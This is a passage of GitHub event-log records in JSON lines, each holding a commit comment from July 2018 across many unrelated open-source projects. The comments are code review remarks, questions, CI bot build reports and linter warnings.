{"id":"8029310040","type":"CommitCommentEvent","actor":{"login":"ppoffice"},"repo":{"name":"ppoffice/hexo-theme-minos"},"payload":{"comment":{"id":29860211,"position":null,"line":null,"path":null,"commit_id":"63bdd0d7f89436b9be269ef9fbb412caba5d4c8e","created_at":"2018-07-27T15:35:32Z","updated_at":"2018-07-27T15:35:32Z","author_association":"OWNER","body":"#54 "}},"created_at":"2018-07-27T15:35:32Z"}
{"id":"8029320717","type":"CommitCommentEvent","actor":{"login":"RezYlander"},"repo":{"name":"RezYlander/OOP-carousell"},"payload":{"comment":{"id":29860237,"position":19,"line":12,"path":"src/index.html","commit_id":"304c9fed7df3d8798c320047e806d64ee8c67d74","created_at":"2018-07-27T15:37:31Z","updated_at":"2018-07-27T15:37:31Z","author_association":"OWNER","body":"w sensie, że użytkownika który zaszczepia komponent  .....\n\npt., 27 lip 2018 o 17:31 Piotr Kowalski <notifications@github.com>\nnapisał(a):\n\n> moja sprawa? okey... to powodzenia\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/RezYlander/OOP-carousell/commit/304c9fed7df3d8798c320047e806d64ee8c67d74#commitcomment-29860149>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Af6RdVQ6BkKVUeA7sqzXdGP4rBm9fz-Eks5uKzI0gaJpZM4Vjf49>\n> .\n>\n\n\n-- \nFilip Witkowski\n"}},"created_at":"2018-07-27T15:37:31Z"}
{"id":"8029322734","type":"CommitCommentEvent","actor":{"login":"basil-conto"},"repo":{"name":"abo-abo/swiper"},"payload":{"comment":{"id":29860248,"position":6,"line":2217,"path":"ivy.el","commit_id":"951560ef88397e23e3bfea7cf2c1d5831234be69","created_at":"2018-07-27T15:37:54Z","updated_at":"2018-07-27T15:37:54Z","author_association":"CONTRIBUTOR","body":"Better use `remove-list-of-text-properties`, as `remove-text-properties` expects a property plist."}},"created_at":"2018-07-27T15:37:54Z"}
{"id":"8029323039","type":"CommitCommentEvent","actor":{"login":"iredpath"},"repo":{"name":"belph/rosette-api-java"},"payload":{"comment":{"id":29860249,"position":null,"line":null,"path":null,"commit_id":"2ba9dc1033530bdd2fbb60980a5f63e21d785eb1","created_at":"2018-07-27T15:37:57Z","updated_at":"2018-07-27T15:37:57Z","author_association":"NONE","body":"LGTM, although maybe we want to simply deprecate `embedding` for now instead of removing it?  I'm not sure what we usually do for breaking changes like this"}},"created_at":"2018-07-27T15:37:57Z"}
{"id":"8029326857","type":"CommitCommentEvent","actor":{"login":"CTLocalGovTeam"},"repo":{"name":"Esri/visibility-addin-dotnet"},"payload":{"comment":{"id":29860253,"position":4,"line":56,"path":"source/addins/ProAppVisibilityModule/ProAppVisibilityModule.csproj","commit_id":"573fa78bd008acf2c95e4824da145cb07559b157","created_at":"2018-07-27T15:38:40Z","updated_at":"2018-07-27T15:38:40Z","author_association":"COLLABORATOR","body":"@ACueva @topowright @dfoll We have removed theses erroneously added references and we will send the updates in a new pull request."}},"created_at":"2018-07-27T15:38:40Z"}
{"id":"8029329344","type":"CommitCommentEvent","actor":{"login":"cpeikert"},"repo":{"name":"cpeikert/Lol"},"payload":{"comment":{"id":29860260,"position":5,"line":16,"path":"lol-cpp/Crypto/Lol/Cyclotomic/Tensor/CPP/g.cpp","commit_id":"197a4c788237844f21186af8dc2f6c6d4d0d7fe0","created_at":"2018-07-27T15:39:08Z","updated_at":"2018-07-27T15:39:08Z","author_association":"OWNER","body":"We don't even necessarily need an _abelian_ group for any of this; we just use `+` and multiplication by integers. Suggest simplifying this and others to `grp`."}},"created_at":"2018-07-27T15:39:08Z"}
{"id":"8029330015","type":"CommitCommentEvent","actor":{"login":"ulf1"},"repo":{"name":"ulf1/oxyba"},"payload":{"comment":{"id":29860262,"position":null,"line":null,"path":null,"commit_id":"dcaf37daf9ea5999caefce55309c02affabff002","created_at":"2018-07-27T15:39:16Z","updated_at":"2018-07-27T15:39:16Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [clean_german_date](https://trello.com/c/Oc7THeXX/48-cleangermandate)"}},"created_at":"2018-07-27T15:39:16Z"}
{"id":"8029342669","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Jekaa/Stockfish"},"payload":{"comment":{"id":29860294,"position":null,"line":null,"path":null,"commit_id":"d8187b634a58c786ac1ebce491f8946a9acb6fa6","created_at":"2018-07-27T15:41:29Z","updated_at":"2018-07-27T15:41:29Z","author_association":"NONE","body":"KNIGHT=2 so you have to subtract -3 not -4 else for bishops you use array index -1"}},"created_at":"2018-07-27T15:41:29Z"}
{"id":"8029343430","type":"CommitCommentEvent","actor":{"login":"ChuckNoriz"},"repo":{"name":"ChuckNoriz/front-end-gurus"},"payload":{"comment":{"id":29860295,"position":6,"line":13,"path":"index.html","commit_id":"730c8b8a61baa05b1ab15145a97f47e9cca9176e","created_at":"2018-07-27T15:41:36Z","updated_at":"2018-07-27T15:41:36Z","author_association":"OWNER","body":"I mean what happened ?"}},"created_at":"2018-07-27T15:41:36Z"}
{"id":"8029346695","type":"CommitCommentEvent","actor":{"login":"awaisakhter1"},"repo":{"name":"tecnickcom/TCPDF"},"payload":{"comment":{"id":29860302,"position":null,"line":null,"path":null,"commit_id":"58d7550f1f77a22c7623e7d9e6f2b7f297167443","created_at":"2018-07-27T15:42:11Z","updated_at":"2018-07-27T15:42:11Z","author_association":"NONE","body":"I have a question\r\nIn tcpdf I used writeHTMLCell to display text on the pdf, but when the new page is created automatically then the color is also starting display on the second page. Is there any method in tcpdf that help to prevent the color to display on the second page?\r\n\r\nTcpdf code I used:\r\n$pdf->SetFillColor(255, 255, 255); \r\n$pdf->writeHTMLCell(104, '80', '105', 80, $br, '', 0, 1, true, 'J', true);\r\n\r\n![image](https://user-images.githubusercontent.com/17291876/43330562-fea29282-91dc-11e8-970b-0971b2e69e65.png)\r\n\r\n"}},"created_at":"2018-07-27T15:42:11Z"}
{"id":"8029350073","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29860313,"position":null,"line":null,"path":null,"commit_id":"9be523493c4b59aba8e09b2e8d0c6b5c74f29899","created_at":"2018-07-27T15:42:49Z","updated_at":"2018-07-27T15:42:49Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (3324 of 3324 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9be523493c4b59aba8e09b2e8d0c6b5c74f29899-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9be523493c4b59aba8e09b2e8d0c6b5c74f29899-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-27T15:42:49Z"}
{"id":"8029350214","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29860314,"position":null,"line":null,"path":null,"commit_id":"66b8644197b6fea0f1a4b6f994f14815aa7aeba2","created_at":"2018-07-27T15:42:51Z","updated_at":"2018-07-27T15:42:51Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1700 of 1700 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-66b8644197b6fea0f1a4b6f994f14815aa7aeba2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-66b8644197b6fea0f1a4b6f994f14815aa7aeba2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-66b8644197b6fea0f1a4b6f994f14815aa7aeba2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.05%25-green.png)</a>\n"}},"created_at":"2018-07-27T15:42:51Z"}
{"id":"8029356746","type":"CommitCommentEvent","actor":{"login":"carlct"},"repo":{"name":"klanchman/homebridge-logi-circle-privacy"},"payload":{"comment":{"id":29860319,"position":null,"line":null,"path":null,"commit_id":"e099b4db38253a5d47449cd2a01f6ddf11fece3b","created_at":"2018-07-27T15:44:07Z","updated_at":"2018-07-27T15:44:07Z","author_association":"NONE","body":"Hello there!  Thank you for this great plugin.  You are the first soul who have shared any Homebridge plugin for the Circle camera.  This is very nice.\r\n\r\nI’m wondering if you would develop further to add an on/off button (I found the identifier for it is “streamingMode”).\r\n\r\nAnyway, so cool to have your plugin."}},"created_at":"2018-07-27T15:44:07Z"}
{"id":"8029361171","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29860326,"position":null,"line":null,"path":null,"commit_id":"5914fc1a418b163a0f3f14a27569d15f3348e131","created_at":"2018-07-27T15:44:58Z","updated_at":"2018-07-27T15:44:58Z","author_association":"NONE","body":"Against contempt=0 this should fail (as my last contempt tests show. there contempt=24 failed)"}},"created_at":"2018-07-27T15:44:58Z"}
{"id":"8029361841","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29860328,"position":null,"line":null,"path":null,"commit_id":"403ccdea1e510dd03eedfdaf07b3a83f5e9f5d1e","created_at":"2018-07-27T15:45:06Z","updated_at":"2018-07-27T15:45:06Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-69](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-69).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-69-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-27T15:45:06Z"}
{"id":"8029365628","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29860336,"position":null,"line":null,"path":null,"commit_id":"c02358c32ba48c3382f8e133056944ed71393b2a","created_at":"2018-07-27T15:45:50Z","updated_at":"2018-07-27T15:45:50Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios-device-tests/12/display/redirect) (on internal Jenkins) failed in stage 'Run device tests' 🔥 : hudson.AbortException: script returned exit code 255\n\n🔥 [Failed to publish results](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios-device-tests/12//console) 🔥\n🔥 [Failed to publish results](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios-device-tests/12//console) 🔥\n🔥 [Test run failed]() 🔥\n"}},"created_at":"2018-07-27T15:45:50Z"}
{"id":"8029368106","type":"CommitCommentEvent","actor":{"login":"LAX18"},"repo":{"name":"calc84maniac/tiboyce"},"payload":{"comment":{"id":29860342,"position":null,"line":null,"path":null,"commit_id":"72e66a2d319d4ccbfa573c0095a96501e8000b8e","created_at":"2018-07-27T15:46:18Z","updated_at":"2018-07-27T15:46:18Z","author_association":"NONE","body":"jcgter: Just use SPASM"}},"created_at":"2018-07-27T15:46:18Z"}
{"id":"8029372007","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29860346,"position":12,"line":12,"path":"test/account-mgmt.test.js","commit_id":"a7fb2073da69ebfcd37576b6a256321f2ff52261","created_at":"2018-07-27T15:47:04Z","updated_at":"2018-07-27T15:47:04Z","author_association":"OWNER","body":"ah, thank you!"}},"created_at":"2018-07-27T15:47:04Z"}
{"id":"8029376205","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29860353,"position":null,"line":null,"path":null,"commit_id":"5aefa7f69f5df38e590d58fedb2f02b1b46f6841","created_at":"2018-07-27T15:47:51Z","updated_at":"2018-07-27T15:47:51Z","author_association":"NONE","body":"Already tried...\r\nhttp://tests.stockfishchess.org/tests/view/5b5b2da90ebc5902bdb8dcc9"}},"created_at":"2018-07-27T15:47:51Z"}
{"id":"8029378062","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29860359,"position":23,"line":23,"path":"course_1/part_3/days.rb","commit_id":"5e12b79ff77009cbf2e31c60017895aa6d519e8b","created_at":"2018-07-27T15:48:11Z","updated_at":"2018-07-27T15:48:11Z","author_association":"NONE","body":"бессмысленно использовать хеш с ключами типа индекса\r\nхеши, в отличие от массивов, используются для хранения значений соотнесенных с ключами\r\nимеются в виду какие-то ключи, осмысленные, а не цифры\r\nдля хранения значений \"под индексами\" замечательно работают массивы\r\nхеш имеет смысл, если он выглядит примерно так:\r\n```ruby\r\naddress = {\r\n  country: 'Russia',\r\n  city: 'Moscow',\r\n  street: 'Bolshaia Sadovaia',\r\n  house: { number: 302, building: 'B'},\r\n  apartments: 50\r\n}"}},"created_at":"2018-07-27T15:48:11Z"}
{"id":"8029378854","type":"CommitCommentEvent","actor":{"login":"timvasil"},"repo":{"name":"selectize/selectize.js"},"payload":{"comment":{"id":29860362,"position":4,"line":181,"path":"src/selectize.js","commit_id":"bbdde959beb26d019bc8005de21564ae025a1458","created_at":"2018-07-27T15:48:20Z","updated_at":"2018-07-27T15:48:20Z","author_association":"NONE","body":"IE10/11 throws an argument exception here.  You can't set type to an empty string or these select values."}},"created_at":"2018-07-27T15:48:20Z"}
{"id":"8029380530","type":"CommitCommentEvent","actor":{"login":"blerner"},"repo":{"name":"brownplt/pyret-lang"},"payload":{"comment":{"id":29860366,"position":null,"line":null,"path":null,"commit_id":"905def3a4c0d7c687602d259c6c81928a54d6e60","created_at":"2018-07-27T15:48:40Z","updated_at":"2018-07-27T15:48:40Z","author_association":"MEMBER","body":"I think I've got this fixed.  Will push a commit to this branch imminently.  If it doesn't work, revert it, but `make test` is working for me, including new parse tests for handling commas properly."}},"created_at":"2018-07-27T15:48:40Z"}
{"id":"8029385555","type":"CommitCommentEvent","actor":{"login":"giselyalves13"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29860378,"position":34,"line":34,"path":"app/controllers/users_controller.rb","commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-27T15:49:38Z","updated_at":"2018-07-27T15:49:38Z","author_association":"OWNER","body":"O respond_to seria pra fazer algo no formato de API?"}},"created_at":"2018-07-27T15:49:38Z"}
{"id":"8029385742","type":"CommitCommentEvent","actor":{"login":"spacemud"},"repo":{"name":"LinkyLuke/QuizApp"},"payload":{"comment":{"id":29860379,"position":5,"line":14,"path":"Templates/layout.html","commit_id":"f739c31ae64602b4a0b0316e9be78de72a7e828e","created_at":"2018-07-27T15:49:41Z","updated_at":"2018-07-27T15:49:41Z","author_association":"COLLABORATOR","body":"NO"}},"created_at":"2018-07-27T15:49:41Z"}
{"id":"8029386191","type":"CommitCommentEvent","actor":{"login":"spacemud"},"repo":{"name":"LinkyLuke/QuizApp"},"payload":{"comment":{"id":29860380,"position":8,"line":16,"path":"Templates/layout.html","commit_id":"f739c31ae64602b4a0b0316e9be78de72a7e828e","created_at":"2018-07-27T15:49:46Z","updated_at":"2018-07-27T15:49:46Z","author_association":"COLLABORATOR","body":"NO"}},"created_at":"2018-07-27T15:49:46Z"}
{"id":"8029387554","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29860381,"position":44,"line":44,"path":"course_1/part_3/days.rb","commit_id":"5e12b79ff77009cbf2e31c60017895aa6d519e8b","created_at":"2018-07-27T15:50:02Z","updated_at":"2018-07-27T15:50:02Z","author_association":"NONE","body":"строки с 28 по 44 можно уместить в одну строку и кроме экономии места это будет более \"читабельный\", т.е. более понятный код"}},"created_at":"2018-07-27T15:50:02Z"}
{"id":"8029388453","type":"CommitCommentEvent","actor":{"login":"LAX18"},"repo":{"name":"calc84maniac/tiboyce"},"payload":{"comment":{"id":29860383,"position":null,"line":null,"path":null,"commit_id":"72e66a2d319d4ccbfa573c0095a96501e8000b8e","created_at":"2018-07-27T15:50:14Z","updated_at":"2018-07-27T15:50:14Z","author_association":"NONE","body":"@jcgter777 https://github.com/calc84maniac/tiboyce/blob/master/README.md#build-instructions"}},"created_at":"2018-07-27T15:50:14Z"}
{"id":"8029393048","type":"CommitCommentEvent","actor":{"login":"Jmeer"},"repo":{"name":"Jmeer/practice"},"payload":{"comment":{"id":29860398,"position":1,"line":1,"path":"README.md","commit_id":"49324a11ccce6d4ec62e0023ee66345ba261e37c","created_at":"2018-07-27T15:51:07Z","updated_at":"2018-07-27T15:51:07Z","author_association":"OWNER","body":"![screenshot 14](https://user-images.githubusercontent.com/41696828/43331070-91e8b756-91e2-11e8-8b50-0424e3153d60.png)\r\n![screenshot 15](https://user-images.githubusercontent.com/41696828/43331071-9239042c-91e2-11e8-82c5-b302c9338d68.png)\r\n![screenshot 16](https://user-images.githubusercontent.com/41696828/43331072-9341fd60-91e2-11e8-95ec-c84e81209b4c.png)\r\n![screenshot 17](https://user-images.githubusercontent.com/41696828/43331074-941c9150-91e2-11e8-8d73-dc3557790678.png)\r\n![screenshot 18](https://user-images.githubusercontent.com/41696828/43331076-952f9c54-91e2-11e8-8838-d34e25ac034f.png)\r\n![screenshot 19](https://user-images.githubusercontent.com/41696828/43331079-96eec560-91e2-11e8-9352-0f7fe34cf2a3.png)\r\n![screenshot 20](https://user-images.githubusercontent.com/41696828/43331084-9a3fc6ba-91e2-11e8-8e5a-1cfbc6d8339c.png)\r\n![screenshot 21](https://user-images.githubusercontent.com/41696828/43331086-9b0617ca-91e2-11e8-81bf-73187f85880d.png)\r\n![screenshot 22](https://user-images.githubusercontent.com/41696828/43331087-9b85d7a8-91e2-11e8-8347-0815b186d6d1.png)\r\n![screenshot 23](https://user-images.githubusercontent.com/41696828/43331088-9c40eec6-91e2-11e8-8b75-6581908d6385.png)\r\n![screenshot 24](https://user-images.githubusercontent.com/41696828/43331089-9c86a6b4-91e2-11e8-8e65-f5d23adac06b.png)\r\n![screenshot 25](https://user-images.githubusercontent.com/41696828/43331091-9cd0dbbc-91e2-11e8-8404-3daf0cf44957.png)\r\n![screenshot 26](https://user-images.githubusercontent.com/41696828/43331096-9da45ad2-91e2-11e8-842f-f13b91465a04.png)\r\n![screenshot 27](https://user-images.githubusercontent.com/41696828/43331098-9de82adc-91e2-11e8-9e86-950b34b08685.png)\r\n"}},"created_at":"2018-07-27T15:51:07Z"}
{"id":"8029396027","type":"CommitCommentEvent","actor":{"login":"KRodinn"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29860400,"position":null,"line":null,"path":null,"commit_id":"8f1e10f085c61359e8b886462671642f64a53ea8","created_at":"2018-07-27T15:51:41Z","updated_at":"2018-07-27T15:51:41Z","author_association":"OWNER","body":"> Совместимость вроде не страдает.\r\n\r\nНу да. Только m_netpk можно доделать, чтоб менять можно было через него тип зарядов, кол-во зарядов в серверном объекте. Ну, без битоёбства в скриптах, чтоб m_netpk это всё сам преобразовывал. Мало ли, может будет надо.\r\n\r\n> на тип отводится 2 бита и 5 на кол-во. Правильно?\r\n> Подствольная граната же одна. Или это на будущее?\r\n\r\nТы забыл наверно, что в режиме обычной стрельбы там - данные о типе и кол-ве зарядов в подстволе, а в режиме стрельбы из подствола - там данные о типе и кол-ве патронов в стволе. Вот поэтому, наверное."}},"created_at":"2018-07-27T15:51:41Z"}
{"id":"8029396760","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29860401,"position":44,"line":44,"path":"course_1/part_3/days.rb","commit_id":"5e12b79ff77009cbf2e31c60017895aa6d519e8b","created_at":"2018-07-27T15:51:50Z","updated_at":"2018-07-27T15:51:50Z","author_association":"NONE","body":"три разрозенных проверки правильно объеденить в одну, а переменная `leap` вообще не нужна, 43 строку нужно будет просто выполнить по результатам этой комплексной проверки (нужно исползовать `&&`, `||`)"}},"created_at":"2018-07-27T15:51:50Z"}
{"id":"8029398886","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29860406,"position":44,"line":44,"path":"course_1/part_3/days.rb","commit_id":"5e12b79ff77009cbf2e31c60017895aa6d519e8b","created_at":"2018-07-27T15:52:13Z","updated_at":"2018-07-27T15:52:13Z","author_association":"NONE","body":"в руби не рекомендуют использовать `if / end` блоки без `else` ветви, если код умещается на одной строке\r\nдля такого случая предпочтение отдается \"постфиксной\" форме `if`\r\nдругими словами вместо\r\n```ruby {.line-numbers}\r\n    if a > b\r\n      do_something\r\n    end\r\n```\r\nрекомендуется писать\r\n```ruby {.line-numbers}\r\n    do_something if a > b\r\n```\r\n\r\nможно и нужно использовать префиксный if (до тела), если:\r\n- код, выполняемый по условию сложный (в несколько строк)\r\n- код занимает одну строку, но она длинаая\r\n"}},"created_at":"2018-07-27T15:52:13Z"}
{"id":"8029406231","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29860419,"position":58,"line":58,"path":"course_1/part_3/days.rb","commit_id":"5e12b79ff77009cbf2e31c60017895aa6d519e8b","created_at":"2018-07-27T15:53:36Z","updated_at":"2018-07-27T15:53:36Z","author_association":"NONE","body":"строки с 50 по 58 также можно и нужно объеденить, потому что много дублирования\r\nпросто записать более сложноую проверку и оставить один блок вместо двух"}},"created_at":"2018-07-27T15:53:36Z"}
{"id":"8029406500","type":"CommitCommentEvent","actor":{"login":"grimfang4"},"repo":{"name":"vit9696/sdl-gpu"},"payload":{"comment":{"id":29860420,"position":null,"line":null,"path":null,"commit_id":"561387f4b17441e05015f87f6b5004e113af9951","created_at":"2018-07-27T15:53:39Z","updated_at":"2018-07-27T15:53:39Z","author_association":"NONE","body":"Yeah, this is the meatier commit.  So, the difference here is potentially in the order of the matrix multiplication.  It might need another look to see if it's correct.\r\n\r\n(1) gpu_upload_modelviewprojection() does (in clearer words):\r\n  Copy(p, GetProjection())\r\n  Copy(mv, GetModelview())\r\n  Copy(cam, GetCameraMatrix())\r\n  cam = cam * p\r\n  p = cam\r\n  mvp = p * mv\r\n\r\n(2) The change here does:\r\n  mvp = GetProjection() * GetModelview()\r\n  Copy(cam, GetCameraMatrix())\r\n  mvp = mvp * cam\r\n\r\nSo the difference appears to be:\r\n  (1) mvp = cam * p * mv\r\n  (2) mvp = p * mv * cam\r\n\r\nJudging from that, I'd say (2) makes more sense.  I changed gpu_upload_modelviewprojection() in https://github.com/grimfang4/sdl-gpu/commit/d4a4b39e7defb2ff9728373d5f204d1dbe486a90 and it doesn't seem to mess anything up in my tests (which means my tests aren't good enough!).  Does it work for you?"}},"created_at":"2018-07-27T15:53:39Z"}
{"id":"8029414904","type":"CommitCommentEvent","actor":{"login":"alex-bely"},"repo":{"name":"alex-bely/VirtualWardrobe"},"payload":{"comment":{"id":29860434,"position":null,"line":null,"path":null,"commit_id":"a3742effaabee630a569375e345ef1b71be8b584","created_at":"2018-07-27T15:55:18Z","updated_at":"2018-07-27T15:55:18Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Load images on main page](https://trello.com/c/P16i7eTb/3-load-images-on-main-page)"}},"created_at":"2018-07-27T15:55:18Z"}
{"id":"8029415346","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"ubccpsc/classy"},"payload":{"comment":{"id":29860436,"position":6,"line":261,"path":"packages/portal/backend/src/server/common/AuthRoutes.ts","commit_id":"1645f2d282da50f24569d69342950ef10589529b","created_at":"2018-07-27T15:55:23Z","updated_at":"2018-07-27T15:55:23Z","author_association":"COLLABORATOR","body":"That's super annoying, sorry! I figured out why it reverted--won't happen again."}},"created_at":"2018-07-27T15:55:23Z"}
{"id":"8029415552","type":"CommitCommentEvent","actor":{"login":"E-Scanner"},"repo":{"name":"E-Scanner/web"},"payload":{"comment":{"id":29860437,"position":null,"line":null,"path":null,"commit_id":"3e8078889da4ff76dad39eab2f2403ccfac4b912","created_at":"2018-07-27T15:55:26Z","updated_at":"2018-07-27T15:55:26Z","author_association":"OWNER","body":"* logging"}},"created_at":"2018-07-27T15:55:26Z"}
{"id":"8029416474","type":"CommitCommentEvent","actor":{"login":"EndLess728"},"repo":{"name":"AEXmod/platform_packages_apps_Dialer"},"payload":{"comment":{"id":29860439,"position":null,"line":null,"path":null,"commit_id":"fb733dce7f47c02fbc1f57f3f24560e03a5ba8b2","created_at":"2018-07-27T15:55:36Z","updated_at":"2018-07-27T15:55:36Z","author_association":"NONE","body":"Bug :- if We Minimize the call during calls to do some other work on other apps or just only minimize it , the recording time resets and start again when we come back to call "}},"created_at":"2018-07-27T15:55:36Z"}
{"id":"8029417212","type":"CommitCommentEvent","actor":{"login":"ProditorMagnus"},"repo":{"name":"inferno8/wesnoth-Era_of_Magic"},"payload":{"comment":{"id":29860441,"position":null,"line":null,"path":null,"commit_id":"02b943bba5a72c640bc3d2a26a478b2b3d6fa855","created_at":"2018-07-27T15:55:45Z","updated_at":"2018-07-27T15:55:45Z","author_association":"COLLABORATOR","body":"1.14 supports status filter without filter_wml as well."}},"created_at":"2018-07-27T15:55:45Z"}
{"id":"8029417424","type":"CommitCommentEvent","actor":{"login":"clwiebe"},"repo":{"name":"ThinkboxSoftware/HoudiniPRTExporter"},"payload":{"comment":{"id":29860442,"position":null,"line":null,"path":null,"commit_id":"0f0b7a2fafeb437ad537f2aa846bf64dad68a5c8","created_at":"2018-07-27T15:55:47Z","updated_at":"2018-07-27T15:55:47Z","author_association":"CONTRIBUTOR","body":"There is not a precompiled version using Houdini 16.5 yet. We hope to provide one as a prepackaged binary. It may also be possible to simply recompile the source code using the Houdini 16.5 API."}},"created_at":"2018-07-27T15:55:47Z"}
{"id":"8029418581","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"inbo/LSVI"},"payload":{"comment":{"id":29860445,"position":null,"line":null,"path":null,"commit_id":"2fbc3fbffbd14262604b5fde9fdc2944aad26d8a","created_at":"2018-07-27T15:56:00Z","updated_at":"2018-07-27T15:56:00Z","author_association":"NONE","body":"[R/berekenLSVIbasis.R:172:1:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/R/berekenLSVIbasis.R#L172) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>        by = c(\"ID\", \"Criterium\", \"Indicator\", \"Voorwaarde.lower\" = \"Voorwaarde\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/combinerenVerschilscore.R:35:6:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/R/combinerenVerschilscore.R#L35) *warning:* **local variable '%max%' assigned but may not be used**\n```r\n<U+200B>    `%max%` <- function(a, b) max(a, b)\n     ^~~~~\n```\n[R/combinerenVerschilscore.R:36:6:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/R/combinerenVerschilscore.R#L36) *warning:* **local variable '%min%' assigned but may not be used**\n```r\n<U+200B>    `%min%` <- function(a, b) min(a, b)\n     ^~~~~\n```\n[R/combinerenVoorwaarden.R:31:1:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/R/combinerenVoorwaarden.R#L31) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen of Formule bestaat uit EN, OF, haakjes en VoorwaardeID's (en evt. andere tekens die logische berekening toelaten)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/deselecteerKenmerkenInOpname.R:45:1:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/R/deselecteerKenmerkenInOpname.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:119:1:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/R/invoercontroleData_soortenKenmerken.R#L119) *style:* **lines should not be more than 80 